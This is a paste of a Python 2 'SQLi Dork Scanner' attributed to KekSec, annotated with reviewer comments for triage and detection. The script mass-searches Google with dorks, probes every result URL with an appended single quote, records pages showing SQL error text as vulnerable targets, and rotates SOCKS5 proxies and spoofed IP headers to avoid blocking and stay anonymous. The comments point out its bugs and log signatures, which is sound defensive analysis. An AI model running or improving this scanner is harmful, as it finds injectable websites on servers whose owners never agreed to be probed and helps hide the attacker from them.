KekSec

SQLi Dork Scanner [FINAL RELEASE]

Jul 8th, 2018
#!/usr/bin/python
#SQLi google dork scanner
#coded by Freak/SynthMesc
#Version 1.0.3
#
# Reviewer summary of what the code in this listing does (for triage and detection):
#   * Python 2 only: print statements, urllib2, "except Exception, e".
#   * Reads search queries from the file named in argv[1], requests Google
#     result pages for each one, and starts one thread per result URL. Each
#     thread requests the URL with a single quote appended and looks for the
#     substrings "SQL", "Syntax" or "Warning" in the response body.
#   * URLs that match are appended to SQLi_Vulnerable.txt in the working
#     directory.
#   * The SOCKS5 proxy list in argv[2] is only used once switchProxy() has
#     run, and switchProxy() is only called after a search request fails;
#     until then connections are made directly.
#   * The check keys on database error text reaching the response body, so
#     parameterised queries and generic error pages remove the signal it
#     looks for. In web logs the probe shows up as a request for an indexed
#     URL with a trailing single quote.
#
# socks is not part of the standard library (presumably SocksiPy/PySocks — confirm).
import sys,re,random,string,time,threading,os,socks
import socket
import urllib2,urllib
# Both file names are read at import time and used as module-level globals by
# switchProxy() and the driver loop at the bottom of the file.
try:
    dorklist=sys.argv[1]
    proxylist=sys.argv[2]
except:
    # Bare except: a missing argument (IndexError) lands here, as would any
    # other exception raised in the try body.
    print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
    exit(1)
def switchProxy():
    """Route sockets created from now on through a randomly chosen SOCKS5 proxy.

    The original ``socket.socket`` class is stored on the socket module as
    ``socket.backup`` the first time this runs, restored at the start of every
    call, and then replaced by ``socks.socksocket``. The replacement is on the
    module itself, so it applies to sockets created afterwards by any thread
    in the process, not only by the caller.

    The proxy is taken from the file named by the module-level ``proxylist``,
    which is re-read on every call; each line is expected to be ``host:port``.
    """
    try:
        # Attribute probe: raises AttributeError on the first call, when no
        # backup has been stored yet (caught by the bare except below).
        socket.backup
    except:
        socket.backup = socket.socket
    socket.socket = socket.backup
    # The file object is never closed explicitly. A line without ":" (for
    # example the empty string left by a trailing newline) makes proxyhost[1]
    # raise IndexError, and a non-numeric port makes int() raise ValueError;
    # neither is caught in this function.
    proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
    proxyport = int(proxyhost[1])
    proxyhost = proxyhost[0]
    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
    socket.socket = socks.socksocket
def randomIP():
    """Return a random dotted-quad string, each octet drawn from 0-255.

    The value is only used as the content of request headers elsewhere in
    this file; it is not validated as a routable or assigned address.
    """
    octets = []
    for _ in range(4):
        octets.append(str(random.randint(0, 255)))
    return '.'.join(octets)
def test(url):
    """Request ``url`` with a single quote appended and scan the body for keywords.

    The response body is split on single spaces and each piece is checked for
    the case-sensitive substrings "SQL", "Syntax" and "Warning". On a hit the
    probed URL is printed and appended to SQLi_Vulnerable.txt. Nothing is
    returned. spyder() runs this function in its own thread for every result
    URL, so several threads may append to the output file at once without any
    locking.

    The match is a plain substring test on page text, so any page that
    happens to contain one of the three words is recorded; it is not evidence
    of an injectable parameter on its own.
    """
    try:
        opener = urllib2.build_opener()
        # Each of the next five statements assigns a new one-element list to
        # opener.addheaders, so only the last assignment (X-FORWARDED-FOR) is
        # in place when the request is made. The User-agent value set first,
        # and the default entry the opener starts with, are replaced too.
        # NOTE(review): confirm on the wire; this suggests requests from this
        # function carry no User-Agent header, which is a usable log signal.
        # These are client-supplied request headers: they do not change the
        # source address of the TCP connection, so a server should take the
        # client address from the connection (or from a header written by its
        # own trusted proxy), never from a value the client sent.
        opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
        opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
        opener.addheaders = [('REMOTE-ADDR',randomIP())]
        opener.addheaders = [('VIA',randomIP())]
        opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
        keywords=["SQL", "Syntax", "Warning"]
        testchar="'"
        print "[+] Trying "+url+testchar
        try:
            resp=opener.open(url+testchar,timeout=5)
        except Exception, e:
            # Any failure to fetch (including HTTP error statuses raised by
            # urllib2) is logged and ends the check for this URL.
            print "[-] "+str(e)
            return
        words = resp.read().split(" ")
        for keyword in keywords:
            try:
                for x in words:
                    if keyword in x:
                        print "[+] Found keyword '"+keyword+"' at "+url+testchar
                        f=open("SQLi_Vulnerable.txt","a")
                        f.write(url+testchar+"\n")
                        f.close()
                        # Leaves only the inner loop; the outer loop goes on
                        # to the next keyword, so one URL can be written once
                        # per matching keyword (up to three times).
                        break
            except urllib2.HTTPError as e:
                # Nothing inside this try appears to perform an HTTP request,
                # so this handler looks unreachable.
                print "[-] "+str(e)
                pass
    except urllib2.URLError as e:
        print "[-] "+str(e)
        pass
def spyder(dork,page):
    """Fetch one search results page and start a test() thread per result URL.

    Args:
        dork: the full search URL to request. The driver loop builds the first
            one; recursive calls pass the "next page" URL found in the results.
        page: counter used to recognise the next-page link, which must end in
            ``start=<page>0&sa=N``.

    Returns nothing. Side effects: network requests, a 5 second sleep before
    each next-page fetch, calls to switchProxy() after failed fetches, and one
    new thread per accepted result URL. Threads are never joined and there is
    no limit on how many run at once.
    """
    opener = urllib2.build_opener()
    # As in test(): every statement below replaces opener.addheaders with a
    # new one-element list, so only the final Referer entry is in place when
    # the request is sent. NOTE(review): confirm on the wire.
    opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
    opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
    opener.addheaders = [('REMOTE-ADDR',randomIP())]
    opener.addheaders = [('VIA',randomIP())]
    opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
    opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
    opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
    opener.addheaders = [('Accept-Encoding','gzip, deflate')]
    opener.addheaders = [('Referer',dork)]
    try:
        searchresults=opener.open(dork,timeout=5).read()
    except Exception, e:
        # Any failure is treated as "blocked": log, switch proxy, and recurse
        # with the same arguments. When the recursive call returns, execution
        # continues below with searchresults still unbound in this frame.
        print "[-] "+str(e)
        print "[-] Bot has been blocked from google!!! Switching proxy!"
        switchProxy()
        spyder(dork, page)
    try:
        # Probe whether the first fetch bound the name. An unbound local
        # raises UnboundLocalError, a subclass of NameError, so the handler
        # below runs exactly when the first fetch failed.
        searchresults
    except NameError:
#       print "[-] Variable undefined, re-searching"
        # Two more attempts with the same opener; if both fail, switch proxy
        # and recurse again. There is no retry limit or delay on this path.
        try:
            searchresults=opener.open(dork,timeout=5).read()
        except:
            try:
                searchresults=opener.open(dork,timeout=5).read()
            except:
                print "[-] Bot has been blocked from google!!! Switching proxy!"
                switchProxy()
                spyder(dork, page)
    else:
        pass
#       print "[+] Variable defined, continuing search"

    # If every fetch in this frame failed, searchresults is still unbound and
    # the findall() call raises; nothing in this function catches that.
    for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
        i=i.replace("amp;",'')
        # Next-page link: relative /search URL whose start offset matches the
        # current page counter. The counter is incremented only after the
        # recursive call for that page has returned.
        if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
            dorkurl="https://encrypted.google.com"+i
            print "[+] Searching next page "+dorkurl
            time.sleep(5)
            spyder(dorkurl,page)
            page+=1
        i=urllib2.unquote(i).decode('utf8')
        try:
            # Keep the text between "?q=" and "&sa=" (presumably the target
            # of a Google redirect link — confirm against real result markup).
            # Links without "?q=" raise IndexError and are skipped by the bare
            # except below, which also hides any other error in this block.
            i=i.split("?q=")[1]
            i=i.split("&sa=")[0]
            if i.startswith("http"):
                    # Only the http:// forms of these Google hosts are
                    # filtered; anything else, apart from the search URL
                    # itself, is handed to test() in a new thread.
                    if i.startswith("http://accounts.google.com"):
                        continue
                    elif i.startswith("http://www.google.com"):
                        continue
                    elif i.startswith("http://encrypted.google.com"):
                        continue
                    elif i.startswith("http://webcache.googleusercontent.com"):
                        continue
                    elif i!=dork.decode('utf8'):
                        threading.Thread(target=test, args=(i,)).start()
        except:
            continue
# Driver: one search per line of the dork list file. The whole file is read
# at once and split on "\n", so a trailing newline produces a final empty
# query that is searched like any other line.
f=open(dorklist,"r")
for dork in f.read().split("\n"):
    print "[+] Searching for dork: '"+dork+"'"
    # The query is URL-encoded and the crawl starts at page counter 1.
    spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
# Only reached if no spyder() call raised; the file is not closed otherwise.
f.close()